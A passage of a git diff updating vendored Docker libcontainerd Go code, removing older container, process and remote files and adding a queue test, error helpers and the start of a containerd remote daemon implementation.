-	return runtime{path, args}
-}
-
-func (rt runtime) Apply(p interface{}) error {
-	if pr, ok := p.(*container); ok {
-		pr.runtime = rt.path
-		pr.runtimeArgs = rt.args
-	}
-	return nil
-}
-
-func (ctr *container) clean() error {
-	if os.Getenv("LIBCONTAINERD_NOCLEAN") == "1" {
-		return nil
-	}
-	if _, err := os.Lstat(ctr.dir); err != nil {
-		if os.IsNotExist(err) {
-			return nil
-		}
-		return err
-	}
-
-	if err := os.RemoveAll(ctr.dir); err != nil {
-		return err
-	}
-	return nil
-}
-
-// cleanProcess removes the fifos used by an additional process.
-// Caller needs to lock container ID before calling this method.
-func (ctr *container) cleanProcess(id string) {
-	if p, ok := ctr.processes[id]; ok {
-		for _, i := range []int{syscall.Stdin, syscall.Stdout, syscall.Stderr} {
-			if err := os.Remove(p.fifo(i)); err != nil && !os.IsNotExist(err) {
-				logrus.Warnf("libcontainerd: failed to remove %v for process %v: %v", p.fifo(i), id, err)
-			}
-		}
-	}
-	delete(ctr.processes, id)
-}
-
-func (ctr *container) spec() (*specs.Spec, error) {
-	var spec specs.Spec
-	dt, err := ioutil.ReadFile(filepath.Join(ctr.dir, configFilename))
-	if err != nil {
-		return nil, err
-	}
-	if err := json.Unmarshal(dt, &spec); err != nil {
-		return nil, err
-	}
-	return &spec, nil
-}
-
-func (ctr *container) start(checkpoint string, checkpointDir string, attachStdio StdioCallback) (err error) {
-	spec, err := ctr.spec()
-	if err != nil {
-		return nil
-	}
-
-	ctx, cancel := context.WithCancel(context.Background())
-	defer cancel()
-	ready := make(chan struct{})
-
-	fifoCtx, cancel := context.WithCancel(context.Background())
-	defer func() {
-		if err != nil {
-			cancel()
-		}
-	}()
-
-	iopipe, err := ctr.openFifos(fifoCtx, spec.Process.Terminal)
-	if err != nil {
-		return err
-	}
-
-	var stdinOnce sync.Once
-
-	// we need to delay stdin closure after container start or else "stdin close"
-	// event will be rejected by containerd.
-	// stdin closure happens in attachStdio
-	stdin := iopipe.Stdin
-	iopipe.Stdin = ioutils.NewWriteCloserWrapper(stdin, func() error {
-		var err error
-		stdinOnce.Do(func() { // on error from attach we don't know if stdin was already closed
-			err = stdin.Close()
-			go func() {
-				select {
-				case <-ready:
-				case <-ctx.Done():
-				}
-				select {
-				case <-ready:
-					if err := ctr.sendCloseStdin(); err != nil {
-						logrus.Warnf("failed to close stdin: %+v", err)
-					}
-				default:
-				}
-			}()
-		})
-		return err
-	})
-
-	r := &containerd.CreateContainerRequest{
-		Id:            ctr.containerID,
-		BundlePath:    ctr.dir,
-		Stdin:         ctr.fifo(syscall.Stdin),
-		Stdout:        ctr.fifo(syscall.Stdout),
-		Stderr:        ctr.fifo(syscall.Stderr),
-		Checkpoint:    checkpoint,
-		CheckpointDir: checkpointDir,
-		// check to see if we are running in ramdisk to disable pivot root
-		NoPivotRoot: os.Getenv("DOCKER_RAMDISK") != "",
-		Runtime:     ctr.runtime,
-		RuntimeArgs: ctr.runtimeArgs,
-	}
-	ctr.client.appendContainer(ctr)
-
-	if err := attachStdio(*iopipe); err != nil {
-		ctr.closeFifos(iopipe)
-		return err
-	}
-
-	resp, err := ctr.client.remote.apiClient.CreateContainer(context.Background(), r)
-	if err != nil {
-		ctr.closeFifos(iopipe)
-		return err
-	}
-	ctr.systemPid = systemPid(resp.Container)
-	close(ready)
-
-	return ctr.client.backend.StateChanged(ctr.containerID, StateInfo{
-		CommonStateInfo: CommonStateInfo{
-			State: StateStart,
-			Pid:   ctr.systemPid,
-		}})
-}
-
-func (ctr *container) newProcess(friendlyName string) *process {
-	return &process{
-		dir: ctr.dir,
-		processCommon: processCommon{
-			containerID:  ctr.containerID,
-			friendlyName: friendlyName,
-			client:       ctr.client,
-		},
-	}
-}
-
-func (ctr *container) handleEvent(e *containerd.Event) error {
-	ctr.client.lock(ctr.containerID)
-	defer ctr.client.unlock(ctr.containerID)
-	switch e.Type {
-	case StateExit, StatePause, StateResume, StateOOM:
-		st := StateInfo{
-			CommonStateInfo: CommonStateInfo{
-				State:    e.Type,
-				ExitCode: e.Status,
-			},
-			OOMKilled: e.Type == StateExit && ctr.oom,
-		}
-		if e.Type == StateOOM {
-			ctr.oom = true
-		}
-		if e.Type == StateExit && e.Pid != InitFriendlyName {
-			st.ProcessID = e.Pid
-			st.State = StateExitProcess
-		}
-
-		// Remove process from list if we have exited
-		switch st.State {
-		case StateExit:
-			ctr.clean()
-			ctr.client.deleteContainer(e.Id)
-		case StateExitProcess:
-			ctr.cleanProcess(st.ProcessID)
-		}
-		ctr.client.q.append(e.Id, func() {
-			if err := ctr.client.backend.StateChanged(e.Id, st); err != nil {
-				logrus.Errorf("libcontainerd: backend.StateChanged(): %v", err)
-			}
-			if e.Type == StatePause || e.Type == StateResume {
-				ctr.pauseMonitor.handle(e.Type)
-			}
-			if e.Type == StateExit {
-				if en := ctr.client.getExitNotifier(e.Id); en != nil {
-					en.close()
-				}
-			}
-		})
-
-	default:
-		logrus.Debugf("libcontainerd: event unhandled: %+v", e)
-	}
-	return nil
-}
-
-// discardFifos attempts to fully read the container fifos to unblock processes
-// that may be blocked on the writer side.
-func (ctr *container) discardFifos() {
-	ctx, _ := context.WithTimeout(context.Background(), 3*time.Second)
-	for _, i := range []int{syscall.Stdout, syscall.Stderr} {
-		f, err := fifo.OpenFifo(ctx, ctr.fifo(i), syscall.O_RDONLY|syscall.O_NONBLOCK, 0)
-		if err != nil {
-			logrus.Warnf("error opening fifo %v for discarding: %+v", f, err)
-			continue
-		}
-		go func() {
-			io.Copy(ioutil.Discard, f)
-		}()
-	}
-}
diff --git a/vendor/github.com/docker/docker/libcontainerd/container_windows.go b/vendor/github.com/docker/docker/libcontainerd/container_windows.go
deleted file mode 100644
index 9b1965099a..0000000000
--- a/vendor/github.com/docker/docker/libcontainerd/container_windows.go
+++ /dev/null
@@ -1,311 +0,0 @@
-package libcontainerd
-
-import (
-	"fmt"
-	"io"
-	"io/ioutil"
-	"strings"
-	"syscall"
-	"time"
-
-	"github.com/Microsoft/hcsshim"
-	"github.com/Sirupsen/logrus"
-	"github.com/opencontainers/runtime-spec/specs-go"
-)
-
-type container struct {
-	containerCommon
-
-	// Platform specific fields are below here. There are none presently on Windows.
-	options []CreateOption
-
-	// The ociSpec is required, as client.Create() needs a spec,
-	// but can be called from the RestartManager context which does not
-	// otherwise have access to the Spec
-	ociSpec specs.Spec
-
-	manualStopRequested bool
-	hcsContainer        hcsshim.Container
-}
-
-func (ctr *container) newProcess(friendlyName string) *process {
-	return &process{
-		processCommon: processCommon{
-			containerID:  ctr.containerID,
-			friendlyName: friendlyName,
-			client:       ctr.client,
-		},
-	}
-}
-
-// start starts a created container.
-// Caller needs to lock container ID before calling this method.
-func (ctr *container) start(attachStdio StdioCallback) error {
-	var err error
-	isServicing := false
-
-	for _, option := range ctr.options {
-		if s, ok := option.(*ServicingOption); ok && s.IsServicing {
-			isServicing = true
-		}
-	}
-
-	// Start the container.  If this is a servicing container, this call will block
-	// until the container is done with the servicing execution.
-	logrus.Debugln("libcontainerd: starting container ", ctr.containerID)
-	if err = ctr.hcsContainer.Start(); err != nil {
-		logrus.Errorf("libcontainerd: failed to start container: %s", err)
-		if err := ctr.terminate(); err != nil {
-			logrus.Errorf("libcontainerd: failed to cleanup after a failed Start. %s", err)
-		} else {
-			logrus.Debugln("libcontainerd: cleaned up after failed Start by calling Terminate")
-		}
-		return err
-	}
-
-	// Note we always tell HCS to
-	// create stdout as it's required regardless of '-i' or '-t' options, so that
-	// docker can always grab the output through logs. We also tell HCS to always
-	// create stdin, even if it's not used - it will be closed shortly. Stderr
-	// is only created if it we're not -t.
-	createProcessParms := &hcsshim.ProcessConfig{
-		EmulateConsole:   ctr.ociSpec.Process.Terminal,
-		WorkingDirectory: ctr.ociSpec.Process.Cwd,
-		CreateStdInPipe:  !isServicing,
-		CreateStdOutPipe: !isServicing,
-		CreateStdErrPipe: !ctr.ociSpec.Process.Terminal && !isServicing,
-	}
-	createProcessParms.ConsoleSize[0] = uint(ctr.ociSpec.Process.ConsoleSize.Height)
-	createProcessParms.ConsoleSize[1] = uint(ctr.ociSpec.Process.ConsoleSize.Width)
-
-	// Configure the environment for the process
-	createProcessParms.Environment = setupEnvironmentVariables(ctr.ociSpec.Process.Env)
-	createProcessParms.CommandLine = strings.Join(ctr.ociSpec.Process.Args, " ")
-	createProcessParms.User = ctr.ociSpec.Process.User.Username
-
-	// Start the command running in the container.
-	newProcess, err := ctr.hcsContainer.CreateProcess(createProcessParms)
-	if err != nil {
-		logrus.Errorf("libcontainerd: CreateProcess() failed %s", err)
-		if err := ctr.terminate(); err != nil {
-			logrus.Errorf("libcontainerd: failed to cleanup after a failed CreateProcess. %s", err)
-		} else {
-			logrus.Debugln("libcontainerd: cleaned up after failed CreateProcess by calling Terminate")
-		}
-		return err
-	}
-
-	pid := newProcess.Pid()
-
-	// Save the hcs Process and PID
-	ctr.process.friendlyName = InitFriendlyName
-	ctr.process.hcsProcess = newProcess
-
-	// If this is a servicing container, wait on the process synchronously here and
-	// if it succeeds, wait for it cleanly shutdown and merge into the parent container.
-	if isServicing {
-		exitCode := ctr.waitProcessExitCode(&ctr.process)
-
-		if exitCode != 0 {
-			if err := ctr.terminate(); err != nil {
-				logrus.Warnf("libcontainerd: terminating servicing container %s failed: %s", ctr.containerID, err)
-			}
-			return fmt.Errorf("libcontainerd: servicing container %s returned non-zero exit code %d", ctr.containerID, exitCode)
-		}
-
-		return ctr.hcsContainer.WaitTimeout(time.Minute * 5)
-	}
-
-	var stdout, stderr io.ReadCloser
-	var stdin io.WriteCloser
-	stdin, stdout, stderr, err = newProcess.Stdio()
-	if err != nil {
-		logrus.Errorf("libcontainerd: failed to get stdio pipes: %s", err)
-		if err := ctr.terminate(); err != nil {
-			logrus.Errorf("libcontainerd: failed to cleanup after a failed Stdio. %s", err)
-		}
-		return err
-	}
-
-	iopipe := &IOPipe{Terminal: ctr.ociSpec.Process.Terminal}
-
-	iopipe.Stdin = createStdInCloser(stdin, newProcess)
-
-	// Convert io.ReadClosers to io.Readers
-	if stdout != nil {
-		iopipe.Stdout = ioutil.NopCloser(&autoClosingReader{ReadCloser: stdout})
-	}
-	if stderr != nil {
-		iopipe.Stderr = ioutil.NopCloser(&autoClosingReader{ReadCloser: stderr})
-	}
-
-	// Save the PID
-	logrus.Debugf("libcontainerd: process started - PID %d", pid)
-	ctr.systemPid = uint32(pid)
-
-	// Spin up a go routine waiting for exit to handle cleanup
-	go ctr.waitExit(&ctr.process, true)
-
-	ctr.client.appendContainer(ctr)
-
-	if err := attachStdio(*iopipe); err != nil {
-		// OK to return the error here, as waitExit will handle tear-down in HCS
-		return err
-	}
-
-	// Tell the docker engine that the container has started.
-	si := StateInfo{
-		CommonStateInfo: CommonStateInfo{
-			State: StateStart,
-			Pid:   ctr.systemPid, // Not sure this is needed? Double-check monitor.go in daemon BUGBUG @jhowardmsft
-		}}
-	logrus.Debugf("libcontainerd: start() completed OK, %+v", si)
-	return ctr.client.backend.StateChanged(ctr.containerID, si)
-
-}
-
-// waitProcessExitCode will wait for the given process to exit and return its error code.
-func (ctr *container) waitProcessExitCode(process *process) int {
-	// Block indefinitely for the process to exit.
-	err := process.hcsProcess.Wait()
-	if err != nil {
-		if herr, ok := err.(*hcsshim.ProcessError); ok && herr.Err != syscall.ERROR_BROKEN_PIPE {
-			logrus.Warnf("libcontainerd: Wait() failed (container may have been killed): %s", err)
-		}
-		// Fall through here, do not return. This ensures we attempt to continue the
-		// shutdown in HCS and tell the docker engine that the process/container
-		// has exited to avoid a container being dropped on the floor.
-	}
-
-	exitCode, err := process.hcsProcess.ExitCode()
-	if err != nil {
-		if herr, ok := err.(*hcsshim.ProcessError); ok && herr.Err != syscall.ERROR_BROKEN_PIPE {
-			logrus.Warnf("libcontainerd: unable to get exit code from container %s", ctr.containerID)
-		}
-		// Since we got an error retrieving the exit code, make sure that the code we return
-		// doesn't incorrectly indicate success.
-		exitCode = -1
-
-		// Fall through here, do not return. This ensures we attempt to continue the
-		// shutdown in HCS and tell the docker engine that the process/container
-		// has exited to avoid a container being dropped on the floor.
-	}
-
-	return exitCode
-}
-
-// waitExit runs as a goroutine waiting for the process to exit. It's
-// equivalent to (in the linux containerd world) where events come in for
-// state change notifications from containerd.
-func (ctr *container) waitExit(process *process, isFirstProcessToStart bool) error {
-	logrus.Debugln("libcontainerd: waitExit() on pid", process.systemPid)
-
-	exitCode := ctr.waitProcessExitCode(process)
-	// Lock the container while shutting down
-	ctr.client.lock(ctr.containerID)
-
-	// Assume the container has exited
-	si := StateInfo{
-		CommonStateInfo: CommonStateInfo{
-			State:     StateExit,
-			ExitCode:  uint32(exitCode),
-			Pid:       process.systemPid,
-			ProcessID: process.friendlyName,
-		},
-		UpdatePending: false,
-	}
-
-	// But it could have been an exec'd process which exited
-	if !isFirstProcessToStart {
-		si.State = StateExitProcess
-		ctr.cleanProcess(process.friendlyName)
-	} else {
-		updatePending, err := ctr.hcsContainer.HasPendingUpdates()
-		if err != nil {
-			logrus.Warnf("libcontainerd: HasPendingUpdates() failed (container may have been killed): %s", err)
-		} else {
-			si.UpdatePending = updatePending
-		}
-
-		logrus.Debugf("libcontainerd: shutting down container %s", ctr.containerID)
-		if err := ctr.shutdown(); err != nil {
-			logrus.Debugf("libcontainerd: failed to shutdown container %s", ctr.containerID)
-		} else {
-			logrus.Debugf("libcontainerd: completed shutting down container %s", ctr.containerID)
-		}
-		if err := ctr.hcsContainer.Close(); err != nil {
-			logrus.Error(err)
-		}
-
-		// Remove process from list if we have exited
-		if si.State == StateExit {
-			ctr.client.deleteContainer(ctr.containerID)
-		}
-	}
-
-	if err := process.hcsProcess.Close(); err != nil {
-		logrus.Errorf("libcontainerd: hcsProcess.Close(): %v", err)
-	}
-
-	// Unlock here before we call back into the daemon to update state
-	ctr.client.unlock(ctr.containerID)
-
-	// Call into the backend to notify it of the state change.
-	logrus.Debugf("libcontainerd: waitExit() calling backend.StateChanged %+v", si)
-	if err := ctr.client.backend.StateChanged(ctr.containerID, si); err != nil {
-		logrus.Error(err)
-	}
-
-	logrus.Debugf("libcontainerd: waitExit() completed OK, %+v", si)
-
-	return nil
-}
-
-// cleanProcess removes process from the map.
-// Caller needs to lock container ID before calling this method.
-func (ctr *container) cleanProcess(id string) {
-	delete(ctr.processes, id)
-}
-
-// shutdown shuts down the container in HCS
-// Caller needs to lock container ID before calling this method.
-func (ctr *container) shutdown() error {
-	const shutdownTimeout = time.Minute * 5
-	err := ctr.hcsContainer.Shutdown()
-	if hcsshim.IsPending(err) {
-		// Explicit timeout to avoid a (remote) possibility that shutdown hangs indefinitely.
-		err = ctr.hcsContainer.WaitTimeout(shutdownTimeout)
-	} else if hcsshim.IsAlreadyStopped(err) {
-		err = nil
-	}
-
-	if err != nil {
-		logrus.Debugf("libcontainerd: error shutting down container %s %v calling terminate", ctr.containerID, err)
-		if err := ctr.terminate(); err != nil {
-			return err
-		}
-		return err
-	}
-
-	return nil
-}
-
-// terminate terminates the container in HCS
-// Caller needs to lock container ID before calling this method.
-func (ctr *container) terminate() error {
-	const terminateTimeout = time.Minute * 5
-	err := ctr.hcsContainer.Terminate()
-
-	if hcsshim.IsPending(err) {
-		err = ctr.hcsContainer.WaitTimeout(terminateTimeout)
-	} else if hcsshim.IsAlreadyStopped(err) {
-		err = nil
-	}
-
-	if err != nil {
-		logrus.Debugf("libcontainerd: error terminating container %s %v", ctr.containerID, err)
-		return err
-	}
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/libcontainerd/errors.go b/vendor/github.com/docker/docker/libcontainerd/errors.go
new file mode 100644
index 0000000000..bdc26715bc
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/errors.go
@@ -0,0 +1,13 @@
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
+
+import (
+	"errors"
+
+	"github.com/docker/docker/errdefs"
+)
+
+func newNotFoundError(err string) error { return errdefs.NotFound(errors.New(err)) }
+
+func newInvalidParameterError(err string) error { return errdefs.InvalidParameter(errors.New(err)) }
+
+func newConflictError(err string) error { return errdefs.Conflict(errors.New(err)) }
diff --git a/vendor/github.com/docker/docker/libcontainerd/oom_linux.go b/vendor/github.com/docker/docker/libcontainerd/oom_linux.go
deleted file mode 100644
index e126b7a550..0000000000
--- a/vendor/github.com/docker/docker/libcontainerd/oom_linux.go
+++ /dev/null
@@ -1,31 +0,0 @@
-package libcontainerd
-
-import (
-	"fmt"
-	"os"
-	"strconv"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/opencontainers/runc/libcontainer/system"
-)
-
-func setOOMScore(pid, score int) error {
-	oomScoreAdjPath := fmt.Sprintf("/proc/%d/oom_score_adj", pid)
-	f, err := os.OpenFile(oomScoreAdjPath, os.O_WRONLY, 0)
-	if err != nil {
-		return err
-	}
-	stringScore := strconv.Itoa(score)
-	_, err = f.WriteString(stringScore)
-	f.Close()
-	if os.IsPermission(err) {
-		// Setting oom_score_adj does not work in an
-		// unprivileged container. Ignore the error, but log
-		// it if we appear not to be in that situation.
-		if !system.RunningInUserNS() {
-			logrus.Debugf("Permission denied writing %q to %s", stringScore, oomScoreAdjPath)
-		}
-		return nil
-	}
-	return err
-}
diff --git a/vendor/github.com/docker/docker/libcontainerd/oom_solaris.go b/vendor/github.com/docker/docker/libcontainerd/oom_solaris.go
deleted file mode 100644
index 2ebe5e87cf..0000000000
--- a/vendor/github.com/docker/docker/libcontainerd/oom_solaris.go
+++ /dev/null
@@ -1,5 +0,0 @@
-package libcontainerd
-
-func setOOMScore(pid, score int) error {
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go b/vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go
deleted file mode 100644
index 4f3766d95c..0000000000
--- a/vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go
+++ /dev/null
@@ -1,42 +0,0 @@
-// +build !windows
-
-package libcontainerd
-
-import (
-	"sync"
-)
-
-// pauseMonitor is helper to get notifications from pause state changes.
-type pauseMonitor struct {
-	sync.Mutex
-	waiters map[string][]chan struct{}
-}
-
-func (m *pauseMonitor) handle(t string) {
-	m.Lock()
-	defer m.Unlock()
-	if m.waiters == nil {
-		return
-	}
-	q, ok := m.waiters[t]
-	if !ok {
-		return
-	}
-	if len(q) > 0 {
-		close(q[0])
-		m.waiters[t] = q[1:]
-	}
-}
-
-func (m *pauseMonitor) append(t string, waiter chan struct{}) {
-	m.Lock()
-	defer m.Unlock()
-	if m.waiters == nil {
-		m.waiters = make(map[string][]chan struct{})
-	}
-	_, ok := m.waiters[t]
-	if !ok {
-		m.waiters[t] = make([]chan struct{}, 0)
-	}
-	m.waiters[t] = append(m.waiters[t], waiter)
-}
diff --git a/vendor/github.com/docker/docker/libcontainerd/process.go b/vendor/github.com/docker/docker/libcontainerd/process.go
deleted file mode 100644
index 57562c8789..0000000000
--- a/vendor/github.com/docker/docker/libcontainerd/process.go
+++ /dev/null
@@ -1,18 +0,0 @@
-package libcontainerd
-
-// processCommon are the platform common fields as part of the process structure
-// which keeps the state for the main container process, as well as any exec
-// processes.
-type processCommon struct {
-	client *client
-
-	// containerID is the Container ID
-	containerID string
-
-	// friendlyName is an identifier for the process (or `InitFriendlyName`
-	// for the first process)
-	friendlyName string
-
-	// systemPid is the PID of the main container process
-	systemPid uint32
-}
diff --git a/vendor/github.com/docker/docker/libcontainerd/process_unix.go b/vendor/github.com/docker/docker/libcontainerd/process_unix.go
deleted file mode 100644
index 506fca6e11..0000000000
--- a/vendor/github.com/docker/docker/libcontainerd/process_unix.go
+++ /dev/null
@@ -1,107 +0,0 @@
-// +build linux solaris
-
-package libcontainerd
-
-import (
-	"io"
-	"io/ioutil"
-	"os"
-	"path/filepath"
-	goruntime "runtime"
-	"strings"
-
-	containerd "github.com/docker/containerd/api/grpc/types"
-	"github.com/tonistiigi/fifo"
-	"golang.org/x/net/context"
-	"golang.org/x/sys/unix"
-)
-
-var fdNames = map[int]string{
-	unix.Stdin:  "stdin",
-	unix.Stdout: "stdout",
-	unix.Stderr: "stderr",
-}
-
-// process keeps the state for both main container process and exec process.
-type process struct {
-	processCommon
-
-	// Platform specific fields are below here.
-	dir string
-}
-
-func (p *process) openFifos(ctx context.Context, terminal bool) (pipe *IOPipe, err error) {
-	if err := os.MkdirAll(p.dir, 0700); err != nil {
-		return nil, err
-	}
-
-	io := &IOPipe{}
-
-	io.Stdin, err = fifo.OpenFifo(ctx, p.fifo(unix.Stdin), unix.O_WRONLY|unix.O_CREAT|unix.O_NONBLOCK, 0700)
-	if err != nil {
-		return nil, err
-	}
-
-	defer func() {
-		if err != nil {
-			io.Stdin.Close()
-		}
-	}()
-
-	io.Stdout, err = fifo.OpenFifo(ctx, p.fifo(unix.Stdout), unix.O_RDONLY|unix.O_CREAT|unix.O_NONBLOCK, 0700)
-	if err != nil {
-		return nil, err
-	}
-
-	defer func() {
-		if err != nil {
-			io.Stdout.Close()
-		}
-	}()
-
-	if goruntime.GOOS == "solaris" || !terminal {
-		// For Solaris terminal handling is done exclusively by the runtime therefore we make no distinction
-		// in the processing for terminal and !terminal cases.
-		io.Stderr, err = fifo.OpenFifo(ctx, p.fifo(unix.Stderr), unix.O_RDONLY|unix.O_CREAT|unix.O_NONBLOCK, 0700)
-		if err != nil {
-			return nil, err
-		}
-		defer func() {
-			if err != nil {
-				io.Stderr.Close()
-			}
-		}()
-	} else {
-		io.Stderr = ioutil.NopCloser(emptyReader{})
-	}
-
-	return io, nil
-}
-
-func (p *process) sendCloseStdin() error {
-	_, err := p.client.remote.apiClient.UpdateProcess(context.Background(), &containerd.UpdateProcessRequest{
-		Id:         p.containerID,
-		Pid:        p.friendlyName,
-		CloseStdin: true,
-	})
-	if err != nil && (strings.Contains(err.Error(), "container not found") || strings.Contains(err.Error(), "process not found")) {
-		return nil
-	}
-	return err
-}
-
-func (p *process) closeFifos(io *IOPipe) {
-	io.Stdin.Close()
-	io.Stdout.Close()
-	io.Stderr.Close()
-}
-
-type emptyReader struct{}
-
-func (r emptyReader) Read(b []byte) (int, error) {
-	return 0, io.EOF
-}
-
-func (p *process) fifo(index int) string {
-	return filepath.Join(p.dir, p.friendlyName+"-"+fdNames[index])
-}
diff --git a/vendor/github.com/docker/docker/libcontainerd/process_windows.go b/vendor/github.com/docker/docker/libcontainerd/process_windows.go
index 57ecc948d0..8cdf1daca8 100644
--- a/vendor/github.com/docker/docker/libcontainerd/process_windows.go
+++ b/vendor/github.com/docker/docker/libcontainerd/process_windows.go
@@ -1,4 +1,4 @@
-package libcontainerd
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
 
 import (
 	"io"
@@ -8,17 +8,6 @@ import (
 	"github.com/docker/docker/pkg/ioutils"
 )
 
-// process keeps the state for both main container process and exec process.
-type process struct {
-	processCommon
-
-	// Platform specific fields are below here.
-
-	// commandLine is to support returning summary information for docker top
-	commandLine string
-	hcsProcess  hcsshim.Process
-}
-
 type autoClosingReader struct {
 	io.ReadCloser
 	sync.Once
@@ -26,7 +15,7 @@ type autoClosingReader struct {
 
 func (r *autoClosingReader) Read(b []byte) (n int, err error) {
 	n, err = r.ReadCloser.Read(b)
-	if err == io.EOF {
+	if err != nil {
 		r.Once.Do(func() { r.ReadCloser.Close() })
 	}
 	return
@@ -49,3 +38,7 @@ func createStdInCloser(pipe io.WriteCloser, process hcsshim.Process) io.WriteClo
 		return nil
 	})
 }
+
+func (p *process) Cleanup() error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/queue_unix.go b/vendor/github.com/docker/docker/libcontainerd/queue.go
similarity index 70%
rename from vendor/github.com/docker/docker/libcontainerd/queue_unix.go
rename to vendor/github.com/docker/docker/libcontainerd/queue.go
index b848b9872b..207722c441 100644
--- a/vendor/github.com/docker/docker/libcontainerd/queue_unix.go
+++ b/vendor/github.com/docker/docker/libcontainerd/queue.go
@@ -1,6 +1,4 @@
-// +build linux solaris
-
-package libcontainerd
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
 
 import "sync"
 
@@ -27,5 +25,11 @@ func (q *queue) append(id string, f func()) {
 		}
 		f()
 		close(done)
+
+		q.Lock()
+		if q.fns[id] == done {
+			delete(q.fns, id)
+		}
+		q.Unlock()
 	}()
 }
diff --git a/vendor/github.com/docker/docker/libcontainerd/queue_test.go b/vendor/github.com/docker/docker/libcontainerd/queue_test.go
new file mode 100644
index 0000000000..e13afca89a
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/queue_test.go
@@ -0,0 +1,31 @@
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
+
+import (
+	"testing"
+	"time"
+
+	"gotest.tools/assert"
+)
+
+func TestSerialization(t *testing.T) {
+	var (
+		q             queue
+		serialization = 1
+	)
+
+	q.append("aaa", func() {
+		//simulate a long time task
+		time.Sleep(10 * time.Millisecond)
+		assert.Equal(t, serialization, 1)
+		serialization = 2
+	})
+	q.append("aaa", func() {
+		assert.Equal(t, serialization, 2)
+		serialization = 3
+	})
+	q.append("aaa", func() {
+		assert.Equal(t, serialization, 3)
+		serialization = 4
+	})
+	time.Sleep(20 * time.Millisecond)
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/remote.go b/vendor/github.com/docker/docker/libcontainerd/remote.go
deleted file mode 100644
index 9031e3ae7d..0000000000
--- a/vendor/github.com/docker/docker/libcontainerd/remote.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package libcontainerd
-
-// Remote on Linux defines the accesspoint to the containerd grpc API.
-// Remote on Windows is largely an unimplemented interface as there is
-// no remote containerd.
-type Remote interface {
-	// Client returns a new Client instance connected with given Backend.
-	Client(Backend) (Client, error)
-	// Cleanup stops containerd if it was started by libcontainerd.
-	// Note this is not used on Windows as there is no remote containerd.
-	Cleanup()
-	// UpdateOptions allows various remote options to be updated at runtime.
-	UpdateOptions(...RemoteOption) error
-}
-
-// RemoteOption allows to configure parameters of remotes.
-// This is unused on Windows.
-type RemoteOption interface {
-	Apply(Remote) error
-}
diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_daemon.go b/vendor/github.com/docker/docker/libcontainerd/remote_daemon.go
new file mode 100644
index 0000000000..cd2ac1ce4d
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/remote_daemon.go
@@ -0,0 +1,344 @@
+// +build !windows
+
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
+
+import (
+	"context"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strconv"
+	"strings"
+	"sync"
+	"syscall"
+	"time"
+
+	"github.com/BurntSushi/toml"
+	"github.com/containerd/containerd"
+	"github.com/containerd/containerd/services/server"
+	"github.com/docker/docker/pkg/system"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+)
+
+const (
+	maxConnectionRetryCount = 3
+	healthCheckTimeout      = 3 * time.Second
+	shutdownTimeout         = 15 * time.Second
+	configFile              = "containerd.toml"
+	binaryName              = "docker-containerd"
+	pidFile                 = "docker-containerd.pid"
+)
+
+type pluginConfigs struct {
+	Plugins map[string]interface{} `toml:"plugins"`
+}
+
+type remote struct {
+	sync.RWMutex
+	server.Config
+
+	daemonPid int
+	logger    *logrus.Entry
+
+	daemonWaitCh    chan struct{}
+	clients         []*client
+	shutdownContext context.Context
+	shutdownCancel  context.CancelFunc
+	shutdown        bool
+
+	// Options
+	startDaemon bool
+	rootDir     string
+	stateDir    string
+	snapshotter string
+	pluginConfs pluginConfigs
+}
+
+// New creates a fresh instance of libcontainerd remote.
+func New(rootDir, stateDir string, options ...RemoteOption) (rem Remote, err error) {
+	defer func() {
+		if err != nil {
+			err = errors.Wrap(err, "Failed to connect to containerd")
+		}
+	}()
+
+	r := &remote{
+		rootDir:  rootDir,
+		stateDir: stateDir,
+		Config: server.Config{
+			Root:  filepath.Join(rootDir, "daemon"),
+			State: filepath.Join(stateDir, "daemon"),
+		},
+		pluginConfs: pluginConfigs{make(map[string]interface{})},
+		daemonPid:   -1,
+		logger:      logrus.WithField("module", "libcontainerd"),
+	}
+	r.shutdownContext, r.shutdownCancel = context.WithCancel(context.Background())
+
+	rem = r
+	for _, option := range options {
+		if err = option.Apply(r); err != nil {
+			return
+		}
+	}
+	r.setDefaults()
+
+	if err = system.MkdirAll(stateDir, 0700, ""); err != nil {
+		return
+	}
+
+	if r.startDaemon {
+		os.Remove(r.GRPC.Address)
+		if err = r.startContainerd(); err != nil {
+			return
+		}
+		defer func() {
+			if err != nil {
+				r.Cleanup()
+			}
+		}()
+	}
+
+	// This connection is just used to monitor the connection
+	client, err := containerd.New(r.GRPC.Address)
+	if err != nil {
+		return
+	}
+	if _, err := client.Version(context.Background()); err != nil {
+		system.KillProcess(r.daemonPid)
+		return nil, errors.Wrapf(err, "unable to get containerd version")
+	}
+
+	go r.monitorConnection(client)
+
+	return r, nil
+}
+
+func (r *remote) NewClient(ns string, b Backend) (Client, error) {
+	c := &client{
+		stateDir:   r.stateDir,
+		logger:     r.logger.WithField("namespace", ns),
+		namespace:  ns,
+		backend:    b,
+		containers: make(map[string]*container),
+	}
+
+	rclient, err := containerd.New(r.GRPC.Address, containerd.WithDefaultNamespace(ns))
+	if err != nil {
+		return nil, err
+	}
+	c.remote = rclient
+
+	go c.processEventStream(r.shutdownContext)
+
+	r.Lock()
+	r.clients = append(r.clients, c)
+	r.Unlock()
+	return c, nil
+}
+
+func (r *remote) Cleanup() {
+	if r.daemonPid != -1 {
+		r.shutdownCancel()
+		r.stopDaemon()
+	}
+
+	// cleanup some files
+	os.Remove(filepath.Join(r.stateDir, pidFile))
+
+	r.platformCleanup()
+}
+
+func (r *remote) getContainerdPid() (int, error) {
